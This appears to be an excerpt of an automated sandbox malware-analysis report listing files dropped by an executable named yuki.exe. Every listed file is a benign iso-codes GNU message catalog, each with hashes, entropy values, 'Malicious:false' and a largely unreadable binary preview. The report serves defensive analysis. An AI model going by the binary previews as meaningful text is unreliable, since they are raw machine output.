                                                                                                    Preview:....................[...........x.......y....................................................................................................................................................................... .......&...............3.......:.......D.......L.......R.......Z.......b.......k.......t.......}...............................................................................................................................................*.......0.......9.......>.......Q.......X.......`.......|.......................................................................................................................!.......'.......,...#...3.......W.......w.......}...............................................................................................................................................".......(...:...3.......n.......x...............................................................................................................................!.......-.......2.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 73 messages, Project-Id-Version: iso_3166-1 '\340\244\205\340\244\253\340\244\227\340\244\276\340\244\250\340\244\277\340\244\270\340\245\215\340\244\244\340\244\276\340\244\250'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4535
                                                                                                    Entropy (8bit):4.994613408035811
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:5irx0gwhZxWzU9SIqFayNyzg/0Y8xdM1tcVENu9nMHUnnnEWvB:tgwX0zUQIcLNyIBntcmbYn/
                                                                                                    MD5:440E7FC859117D246B60270121D183E8
                                                                                                    SHA1:7938081D2B7E2A7A5CD16ACD34D71DA498007297
                                                                                                    SHA-256:437CCCC5BD6C769DC7D756B66563CCB3162E13849289610A03616FD191028894
                                                                                                    SHA-512:7869290FA72A7E6057978F1464948C41D84B409E45DFB4DE751014AC0D91A3F3E6BD9620995ED1D5A708328F42D6B90868A0F2162CE0FC9DD7267147AD510A7F
                                                                                                    Malicious:false
                                                                                                    Preview:........I.......d...a...........0.......1.......=.......E.......M.......a.......k.......s.......}...............................................................................................................................................................................-.......7.......?.......E.......O.......T.......[.......a.......g.......n.......u...............................................................................................................................................).......2.......9.......E.......L.......W.......`.......m.......u...........................................................!.......................2.......!.../.......Q...!...m...............................................................,.......B.......a.......}...............................................................*.......@.......S.......c...........................!..................................................."...$...2.......W.......m...........................................'...
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 107 messages, Project-Id-Version: iso_3166-1 '\320\220\321\204\320\263\320\260\320\275\320\270\321\201\321\202\320\260\320\275'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5636
                                                                                                    Entropy (8bit):5.032871436939297
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:4MP4F/Mr6pAWsOJeUKRUqB2rmuJ0MycIMUM6jSq0gfnKKTkcYGz+8fcZnz:LK2+JeUK6qsrmdA6jIgfKKTkdGzffAnz
                                                                                                    MD5:5193448A4D90A42158ED0B2E5196FEB3
                                                                                                    SHA1:B84B7F563AA54223BCDD538F871FDA25DF40387F
                                                                                                    SHA-256:395FE841B22268DB00EBB939C9FA57A91C95A2F1DC6609D605E3DE381E117167
                                                                                                    SHA-512:FAF23334DCA8397FC971F6FBE2D08B3B2066F92467AAFFBE8EDB9510CBD74CE7CF29503B04D4D2E5ACE8B6EA79E35F454011CE4BEF5C3B6C67D7448EAABBCEE7
                                                                                                    Malicious:false
                                                                                                    Preview:........k.......t............... .......!.......-.......5.......=.......E.......O.......W.......a.......i.......t.......}...............................................................................................................................................+.......3.......?.......G.......P.......X......._.......m.......u.......}...............................................................................................................................................................".......0.......:.......E.......N.......T.......[.......c.......j.......u.......................................................................................................................................&.......1.......;.......D.......M.......U.......[.......e.......n.......u...............................................................................................................................................#.......2.......E.......T.......g.......v.......................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 209 messages, Project-Id-Version: iso_3166-1 '\304\200whekenet\304\201na'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10467
                                                                                                    Entropy (8bit):4.959564439547539
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:B8sIARdL0V/TsnVJkj4oLvaaQ++vHFjzzEN430wpksMCmkWsePAZuLD:B89ARi7GMlDaN+qFj3EN43ppkhFHnAwf
                                                                                                    MD5:F9170B325BC3BFD895B578909A36FB89
                                                                                                    SHA1:BCF3627E40D2CDDC06D09F436FF25BDA1A4F0373
                                                                                                    SHA-256:FA6824F36A8FDC5DEDE6A564157965A0C34CDA2769C91E2917E8E594CA649D8C
                                                                                                    SHA-512:E54F7A37CAF811AE59DD9BDF677BF208F370263055029D258B0A3202F7C67589FF09A5ADFEA73557ABFAC9A4A7D79E9257ACAA8BD6581D3A70E2AE32ED9EC82E
                                                                                                    Malicious:false
                                                                                                    Preview:........................,...............................................................................................................................................2.......9.......B.......J.......S.......\.......c.......i.......o.......x.......~.......................................................................................................................$.......+.......9.......J.......Z.......`.......h.......p.......v...............................................................................................................................................................".......-.......3.......F.......Z.......m...............................................................................................................#.......).......4.......>.......E.......M.......T.......].......h.......p.......{...............................................................................................................................................1.......D.......X.......l.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):446
                                                                                                    Entropy (8bit):5.311276178357509
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijs6YYxA9Ct0vOuvP0NXzff5Mv//RYhLOAFiGR9XmBQ8KMW0YEiONwN2BJl:i4nxxjt02Ukan/ydziIXmBQWiOWEl
                                                                                                    MD5:0DE27A5E7F9F54046B16CB4CB443FA55
                                                                                                    SHA1:005E4BAF0B7FB67310101821D6442EF6C5643280
                                                                                                    SHA-256:1BF40DA671EFC82B62021E508A8E82F7154F7E16EAE79B80E43B41264EE5727E
                                                                                                    SHA-512:C88AA7A9767B3849B9D0527217EA44C56D198E8CF84C0B238CCCA9D17C8E8C1D8047A64BEB747F1107A15B2C2FC0DF3845C9B7C08F4D8073A73B2FDF5E9872CF
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8.......9................Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2013-07-10 19:04+0200.Last-Translator: Chris <cjl@laptop.org>.Language-Team: Sugar Labs.Language: mi.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=(n != 1);.X-Generator: Pootle 2.0.5..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 29 messages, Project-Id-Version: iso_639-3 'Reo \304\200wherika Tatimana'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1619
                                                                                                    Entropy (8bit):4.826541028984427
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:rxxxnsSM//M4PkilI+Ch2/swB9GmuBJXrqinpupCyx1nVt0Us35wqRbXmeyTxmML:rX5M/E4nPCaBc2iGCWnMUoZMey4n2/
                                                                                                    MD5:5E42C5785A70AFCD0234207D36F29A9E
                                                                                                    SHA1:DEE0ECA0C497FF654B078FEB4005AB6157B98E9D
                                                                                                    SHA-256:03784F4AFB09C048C96A750C16FFE057AC2A7BFEC84EDE1C1EC53E13D12EA502
                                                                                                    SHA-512:42783B63CB90F82C921CF737572C52F739F8CDAFBB21D7772944C7C577EDB5411AA0D56FD4C7FFFEBD53DA5FA07DE4EEF3F7258903264FDDA4C3DCED15306E77
                                                                                                    Malicious:false
                                                                                                    Preview:....................)...................................................................................................................................................................!.......*.......5.......;.......B.......M.......V.......^.......f.......n...g...t.......................................#.......;.......F.......T.......a.......n.......y...............................................................................................................#.......-.......7.......C........................................................................................................................................................................Afrikaans.Arabic.Breton.Bulgarian.Catalan.Chinese.Croatian.Danish.Dutch.Estonian.Finnish.French.German.Hebrew.Hungarian.Icelandic.Irish.Italian.Japanese.Macedonian.Maori.Polish.Portuguese.Romanian.Russian.Spanish.Swedish.Tamil.Project-Id-Version: iso_639-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revi
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 402 messages, Project-Id-Version: iso_3166-1 '\320\220\320\262\320\263\320\260\320\275\320\270\321\201\321\202\320\260\320\275'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):27425
                                                                                                    Entropy (8bit):5.205544283914804
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:i6huU+MoZu3j+msOP4XJOAE/uWfe4MUwbn5YGa:i6toCjfFfe4MUwlM
                                                                                                    MD5:71A6FF579E1CA6DF5871862412A7EA1E
                                                                                                    SHA1:01868C2FA4A73ACF80BA739ACB6F594004D8B93B
                                                                                                    SHA-256:7FB6862E7E66766C8D1DB2D55303B522E0BB151432DB06AD21066AEE7952046D
                                                                                                    SHA-512:FB1C1C5D5D8A84AAB835AB8FD35540607E2913F90BE45C4C94CB35F2192829DABAE642F6AA7C789ABAE1066B5B9A7AAECE66875B55C224A0C6FD7F92F03579A5
                                                                                                    Malicious:false
                                                                                                    Preview:........................<........!.......!.......!.......!.......!.......!.......!.......!.......!.......!......."......*"......4"......G"......O"......U"......_"......g"......r"......z".......".......".......".......".......".......".......".......".. ....".......".......".. ....#......,#......C#......L#......Z#......a#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......*$......B$......K$......d$..,....$.......$.......$..%....$.......$.......$.......$.......%.......%.......%.......%......%%..%...4%..,...Z%.."....%..*....%.......%.......%.......%.......%.......&.......&......&&......,&......8&......J&......R&......Z&......c&.......&..'....&..$....&.......&.......&.......'......1'......O'......T'......\'......c'......q'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(.......(...... (......+(......0(......:(......C(......J(......X(......_(......e(..!....(.......(.......(......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\320\221\321\200\320\270\321\202\320\260\320\275\321\201\320\272\320\260 \320\260\320\275\321\202\320\260\321\200\321\202\320\270\321\207\320\272\320\260 \321\202\320\265\321\200\320\270\321\202\320\276\321\200\320\270\321\230\320\260'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3238
                                                                                                    Entropy (8bit):5.443019456358584
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADyg0vfvGqIfdvqNuoUVSbUwTRHbxafqZcrjVGSjNi8o02hgNnJ2:qD6HyBoD9Nt0Xpmzk2
                                                                                                    MD5:F29284C6DE7050D86EF96D94F541C530
                                                                                                    SHA1:CA2F6775478437BA5FCFC0B0AD8AEB26E4FAF2D7
                                                                                                    SHA-256:EC4001B661396EC02A6FC5888AEC276FD5E3D0381FFC2D9C38EA6D34F930286A
                                                                                                    SHA-512:5D3AC25C1850944E976C5E237A110425094F3C111244F67AFA9193320052D1850872B065EAD4C17761E1F86C5B817E481C9600D297A5010ADB92F73C1D72FF29
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................<...2...S...o...\......."... ...b...C...........................*.......).......[...7...<.......-.......$...........#.......?......._.......{...G...............!...................$...=...@...Z...~...(.......8...........;...4...U................................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 40 messages, Project-Id-Version: iso_639-3 '\320\220\321\204\321\200\320\270\320\272\320\260\320\275\321\201\320\272\320\270'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2178
                                                                                                    Entropy (8bit):5.00850564327629
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:O7tudzng0RFsJs6c4s+0Ni7CPMUJzFHb5+Fj+1+Nu19X+/i1gWs1vTn1UFpKaxmi:Sk9g0R76c4m9PMkBEI/4b6
                                                                                                    MD5:A1C6510379B17D8915F4B3F3A4F227D7
                                                                                                    SHA1:E27F9B9354FB5E67403183A6B29D58BE730138CE
                                                                                                    SHA-256:43FC1D8C48961120FBE7F25A28D813962BFC8114FA17E152DA955056E3BBF6C0
                                                                                                    SHA-512:2727A990F2D6849703F1E9AE479C18268356D323354CB775D4501BA209DCDA9501F545027EC57DFC144C3787849CBE0B351A6FF8FA35898BA04C9766CD915323
                                                                                                    Malicious:false
                                                                                                    Preview:........(.......\...5...........p.......q.......{.......................................................................................................................................................................!.......(.......3.......>.......D.......K.......V......._.......g.......o.......v...................................................O...................................0.......C.......T.......i.......x.......................................................................................-.......@.......K.......b.......s...............................................................................................=.......L.......].......d.......q..................................."...............'... ...........#.......%.......&.......................(...................................................$...........................................!............Afrikaans.Arabic.Basque.Breton.Bulgarian.Catalan.Chinese.Croatian.Czech.Danish.Dutch.Esperanto.Estonian.Finnish.French.
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 18 messages, Project-Id-Version: iso_15924 '\340\264\205\340\264\261\340\264\254\340\264\277'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1295
                                                                                                    Entropy (8bit):5.203583069080035
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:tnlRTl1rGKP7cJWXzGUCVt0U3j6XmuvOcCtG1zPGOq:HRTl1rLP7rXzGUlUz3uVCtQLGOq
                                                                                                    MD5:16657D95A342B31250B46022676146E6
                                                                                                    SHA1:5915F5AC50CE898DE4CCA8FFABBB5649F5354E71
                                                                                                    SHA-256:DCFD8FCA81DC77D1308A4A9237A030EDC0002115D478D1395A4C1A7CBF499E6E
                                                                                                    SHA-512:1B073A64394ADCDC0540A895CC29D9E06CEEFD7FD2D1DF861E1A60E1A6A80540D1F91A5A2DD447728A6F9951B46DBDA73226778FCBBFD896D0A1C4EF8433E498
                                                                                                    Malicious:false
                                                                                                    Preview:........................<...............................................................................................................................!.......(...........c...5....................................................... .......3.......C......._.......r........................................................................................................................................................................Arabic.Bengali.Brahmi.Greek.Gujarati.Gurmukhi.Hebrew.Kannada.Latin.Malayalam.Mongolian.Oriya.Saurashtra.Sinhala.Syriac.Tamil.Telugu.Project-Id-Version: iso_15924.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2007-09-09 16:07+0200.Last-Translator: Tobias Quathamer <toddy@debian.org>.Language-Team: Malayalam.Language: .MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.X-Generator: KBabel 1.11.4...............................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 390 messages, Project-Id-Version: iso_3166-1 '\340\264\205\340\264\253\340\265\215\340\264\227\340\264\276\340\264\250\340\264\277\340\264\270\340\265\215\340\264\244\340\264\276\340\264\250\340\265\215\342\200\215'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):34752
                                                                                                    Entropy (8bit):4.982292774488933
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:yOKr/Pi6OwxBrlQmsOP4YGCAjfUq51oOw:y3aHwpgUq51oOw
                                                                                                    MD5:FDF190F09B8727EE556A41F2EFC1FC68
                                                                                                    SHA1:8D551EF84AB3130068B13AF8D5E413259E3EBD76
                                                                                                    SHA-256:9A861EFD136838D2FA783266E0E56F86DCA4C69C1816D39F9132FAC95FBC96FB
                                                                                                    SHA-512:BE4379C8C5EE0C24826FA99ED5FC61BE872A7A0C88A8D9BD2F739146256E97082BB77910948AC6370F214D6CFEF8544C768703ED59C3A621AECEF749F12269B7
                                                                                                    Malicious:false
                                                                                                    Preview:................L.......|........ ....... ....... ....... ....... ....... ....... ....... ....... ....... .......!.......!......$!......7!......?!......E!......O!......W!......b!......j!......r!......}!.......!.......!.......!.......!.......!.......!.. ....!.......!.......!.......!.......!......."......."....../"......F"......X"......a"......n"......v".......".......".......".......".......".......".......".......".......".......".......".......#..,.../#......\#......d#..%...j#.......#.......#.......#.......#.......#.......#.......#..%....#..,....$.."...-$..*...P$......{$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......%.......%......%%..'...3%......[%......w%.......%.......%.......%.......%.......%.......%.......%.......&.......&....../&......5&......G&......N&......V&......^&......d&......n&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&..!....'......$'......6'......T'......]'..0...g'.......'......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\340\264\254\340\265\215\340\264\260\340\264\277\340\264\237\340\265\215\340\264\237\340\265\200\340\264\267\340\265\215 \340\264\205\340\264\250\340\265\215\340\264\261\340\264\276\340\264\260\340\265\215\342\200\215\340\264\237\340\265\215\340\264\237\340\264\277\340\264\225\340\265\215 \340\264\252\340\265\215\340\264\260\340\264\246\340\265\207\340\264\266\340\264\202'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4406
                                                                                                    Entropy (8bit):5.093476896300879
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADtXM5vGqIfdvqNuoUZiAopjk2gqha/kJMp9HYIxNPz5H:qDtXIyBorAo/D+jdH
                                                                                                    MD5:6BAC278DEC1B283380D42574E5EF818B
                                                                                                    SHA1:43CC5E7874EBB66AD1C967F8564453B576C3240D
                                                                                                    SHA-256:59D07A9D9961068200E40E43AE7499E2829F2997A352721F8D6E97D97D040783
                                                                                                    SHA-512:B8305F87A8AF194890B9BFCA265D19ADD89DBE0447878AE5D0BB7670FAACB9FA775FEB9A48445E95CE2B88A1F13A60EE14B19C36A41F5A70F11A6417C7A1E3B8
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c..................._...+...Y..............._.......................A.......1.......M...#...J...q...........V...D...b.......F.......4...E...C...z...........+.......e......./.......O.......................`...D...........P...C...........(...".......K...1............................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 195 messages, Project-Id-Version: iso_3166-1 '\320\220\321\204\320\263\320\260\320\275\321\201\321\202\320\260\320\275'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10101
                                                                                                    Entropy (8bit):5.071872151310648
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:H2rublMYG/hRmvVbKTt4SqUaErjvLFUAYQaKjlnfeoUf7IRjUtISA3L2t:Wr0lGQbKTqjEPziNQaK140Rj2fA3St
                                                                                                    MD5:8C261E5461A21E73C90A12230B979516
                                                                                                    SHA1:E4D77355F5B534993C3402D6FD171C3E1689067B
                                                                                                    SHA-256:FF141496963FC7F856B5657C4FC1CCA2BAE6DB85538E10F95CD9DD54685726CF
                                                                                                    SHA-512:3D5AEAAF1720556489330DA3CA808E11136A6917EA4C9B382837F1B807685CD3FE271BBF1104FA9424865B79E4167DAB6BAF5187E16D4124785780014F82347B
                                                                                                    Malicious:false
                                                                                                    Preview:................4.......L.......h.......i.......u.......}.......................................................................................................................................................#.......+.......B.......K.......Y.......`.......................................................................................................................$.......*.......5.......=.......B.......I.......X.......`.......i.......|.......................................................................................................................................!.......+.......2.......<.......D.......I.......S.......Z.......a.......g.......p.......z...........................................................................................................&...........................$......./.......6.......>.......F.......L.......Z.......d.......o.......u...............................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):427
                                                                                                    Entropy (8bit):5.252149410829184
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijEYYxA9Ct0vOuvP0NXzff8oq/R8ZIwU/2AF9yM1C3XmBQ8KMW0YEiR8c:i4Exxjt02Ukjq/+ZTG9fQ3XmBQWiR8c
                                                                                                    MD5:43928289D7BD16E813FA8B50A8D1D1DD
                                                                                                    SHA1:89BE1C8ED2E58882C50133284D6911E71EB6233D
                                                                                                    SHA-256:4F2AF6B1478E1F115EA82C42C8A60547C933FCC32C11FE51222A505DC11C78AC
                                                                                                    SHA-512:5B6A08191AA16614FBDBD4BB5C1C8A92E7652BE5C8DB5591286B4B9F9B1BBA73C889FB12BC96DAA510C9E84C8854A3545FA62DD44C07FF65691987B58FF41DBD
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...q...9................Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2003-02-12 21:40+0100.Last-Translator: Sanlig Badral <badral@chinggis.com>.Language-Team: Mongolian <mn@li.org>.Language: mn.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.X-Generator: KBabel 0.9.6..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 82 messages, Project-Id-Version: iso_4217 '\320\220\321\204\320\263\320\260\320\275'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5207
                                                                                                    Entropy (8bit):5.196419929692369
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:fDQO+fWsoFlzyWtlRW4YEJMmSbTdXjGm4RbEVn9UsJ+x:VUqzFfXNdm1GVTse
                                                                                                    MD5:E20A0DB2CEED797DC1DC44CA6E62D92D
                                                                                                    SHA1:30CA7E51781F5002405085756B74DD363ED90425
                                                                                                    SHA-256:09D8654EB4259BFF5314BCEDE9DD4CC572C54D796C9CC79A30CAE2C8F682E019
                                                                                                    SHA-512:A9A8A655588BAC0D02137386623B20E31BF06850F0180C07708FA616E88B0D4EB3E04797306E8B8249EE41CCF09A0EDBFF52F19D0F76697014F230B3EDC10D0F
                                                                                                    Malicious:false
                                                                                                    Preview:........R...........m...<...............................................%.......7.......G.......V.......f.......t...............................................................................................$.......3.......E.......P.......].......j.......y.......................................................................................................%.......1.......A.......Q.......a.......o.......~.......................................................................................!.......2.......B.......Q.......[.......i.......r.......................................................................................................9.......H.......S.......].......l...U...|.......................................!.......?.......[.......u.......................................................".......<.......Q.......e.......t...&...................................................................F.......b... ...v...............................................................".......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 141 messages, Project-Id-Version: iso_639-3 '\320\220\320\261\320\272\320\260\320\260\320\267'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6401
                                                                                                    Entropy (8bit):4.917997010644627
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:QR0AhH16aCWQ70uaru//wB9IbO0wjPXCCuj9MCjbQUBPlzOCuUhqFOZ:QR0a4xWQ7da6nfO0wjPnujedUrtu88OZ
                                                                                                    MD5:30E9CDBBC37F48B1CBC0079D49BE5591
                                                                                                    SHA1:E054D48E811E97E4AF3706C869FA798566B3DF98
                                                                                                    SHA-256:9FF8308AF901A686D646AEE607EF8BD49741D7BD9C1E6EFCC5BC2A03F29435DE
                                                                                                    SHA-512:C49AC07699097734C15BBF4F7EBD930D118C6C39F772E2990A203DE874EB6570D7D96299D5DD57849D509C353584C5E271127D598E57F422BE2F0216C0CFDF27
                                                                                                    Malicious:false
                                                                                                    Preview:................................................................................................#.......,.......4.......;.......G.......O.......V.......a.......i.......q.......y.......................................................................................................................................................................#.......*.......3.......:.......P.......X.......a.......g.......n.......u.......{...............................................................................................................................................................%...............6.......:.......@.......H.......P.......[.......f.......o.......y...............................................................................................................................................................................(.......2.......:.......@.......G.......N.......X......._.......o.......w.......................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 419 messages, Project-Id-Version: iso_3166-1 '\340\244\205\340\244\253\340\244\227\340\244\276\340\244\243\340\244\277\340\244\270\340\245\215\340\244\244\340\244\276\340\244\250'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):35144
                                                                                                    Entropy (8bit):4.996165237444036
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:jhl7o5a/DOQ34Dv6j/Ubjh5wsWP4XdAIzirGePCkXFvppAKfIfjmQO:jhZC+k+ItmsWP4XdAIECk7JWqQO
                                                                                                    MD5:188014B26E06CE3C47152FFD17434781
                                                                                                    SHA1:D4D2AA0C5076813C24DB9AAB9F55DF55FACF81B2
                                                                                                    SHA-256:0674B11E78DF9137171F4DD56A16D3DE4C6BD5BEB36C71185F0877DC44650BB8
                                                                                                    SHA-512:7F15EECFDD07C04ACE30E539A4CF58B9754C7FB18ACA16E969B066AF309A3D958FF5384E67654B10B29EF8A41A21B2D837434D60AAC9F3907141F6A8C03D8FC7
                                                                                                    Malicious:false
                                                                                                    Preview:................4...3...L........#.......#......%#......-#......5#......D#......L#......S#......\#......g#......{#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......#$.. ...*$......K$......S$.. ...s$.......$.......$.......$.......$.......$.......$.......$.......%.......%......'%....../%......:%......C%......L%......S%......b%......{%.......%.......%.......%.......%.......%.......%.......%..,....%...... &......(&..%....&......T&......a&......l&......t&......y&.......&.......&.......&.......&..%....&..,....&.."....'..*...%'......P'......X'......a'......j'......}'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(..'....(..$...9(......^(......z(.......(.......(.......(.......(.......(.......(.......).......)......")......2)......N)......T)......f)......m)......u)......}).......).......).......).......).......).......).......).......).......).......).......).......).......)......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\340\244\254\340\245\215\340\244\260\340\244\277\340\244\237\340\244\277\340\244\266 \340\244\205\340\244\202\340\244\237\340\244\276\340\244\260\340\245\215\340\244\237\340\244\277\340\244\225 \340\244\237\340\245\207\340\244\260\340\244\277\340\244\237\340\245\213\340\244\260\340\245\200'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3916
                                                                                                    Entropy (8bit):5.214047253872838
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADnxJzDAcV9vGqIfdvqNuoUWvFi9crXyteZXST0K9AfXC0qxnRJ7OHPq2:qDRyBo49OSTyvTGRIHPb
                                                                                                    MD5:494BE42085990B126E628557F0D5D8F2
                                                                                                    SHA1:671D9DB776A98C88C572D2BE932B0D7C775F7505
                                                                                                    SHA-256:2859B2937F947FABC34AD1B5E3093D90C938AB1DF88C30A5CFA3DF2E5FA420FB
                                                                                                    SHA-512:98C665075F27447FAAF02E1B16E89E0C3990EC429C69791360815CC7AEC13B09B7CC104E1DF17E4EB88CCA37419F588CC96C0F94569A69993C4769FB7D5502A2
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................J...S...j.......v.......K...................[.../...n...........;.......<.......d...4...J.......H.......(...-...%...V...7...|...".......(.......Y.......)...Z...A...............1.......W.......{...f...I.......q...,...........e.......-............................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 7341 messages, Project-Id-Version: iso_639-3 '\340\244\205\340\244\260\340\245\207\340\244\205\340\244\260\340\245\207'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):425099
                                                                                                    Entropy (8bit):5.229291858123859
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:joTEfYGTPw4Cyxl1COB3XJQwiGe9zPNly3qBuGlqUJnc0awn+:j6D4H+wiNzHgapq0Q
                                                                                                    MD5:865B80EDE74FB2D7E51E0E4849A7B9D1
                                                                                                    SHA1:97A7ED7C2F3426F6154308A765ADA9B2E5A13576
                                                                                                    SHA-256:0240A3A797690612D4BEB061048CBF98F042C601C8411B32886EE371095D5E40
                                                                                                    SHA-512:82A171B12A4133D37E45C3DC1E1C92C683488116942F9B0BAAF197CCE91D0D56ABDE3D7062355E584A726839CD3A081CB92512605EE7533AE4A5F7AC6F4A1A50
                                                                                                    Malicious:false
                                                                                                    Preview:....................?&...........c.......c.......c.......c.......d.......d.......d.......d.......d......$d......0d......8d......=d......Bd......Hd......Ud......\d......dd......kd......td......~d.......d.......d.......d.......d.......d.......d.......d.......d.......d.......d.......d.......d.......d.......d.......d.......d.......d.......e.......e.......e......&e....../e......5e......De......Je......Qe......Ve......ne......te......|e.......e.......e.......e.......e.......e.......e.......e.......e.......e.......e.......e.......e.......e.......e.......e.......e.......e.......f.......f.......f......"f......*f......2f......8f......Ff......Lf......Qf......Wf......^f......bf......gf......lf.......f.......f.......f.......f.......f.......f.......f.......f.......g.......g......0g......;g......Bg......Kg......Qg......[g......eg......lg......qg......yg......~g.......g.......g.......g.......g.......g.......g.......g.......g.......g.......g.......g.......g.......g.......g.......g.......g.......h......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
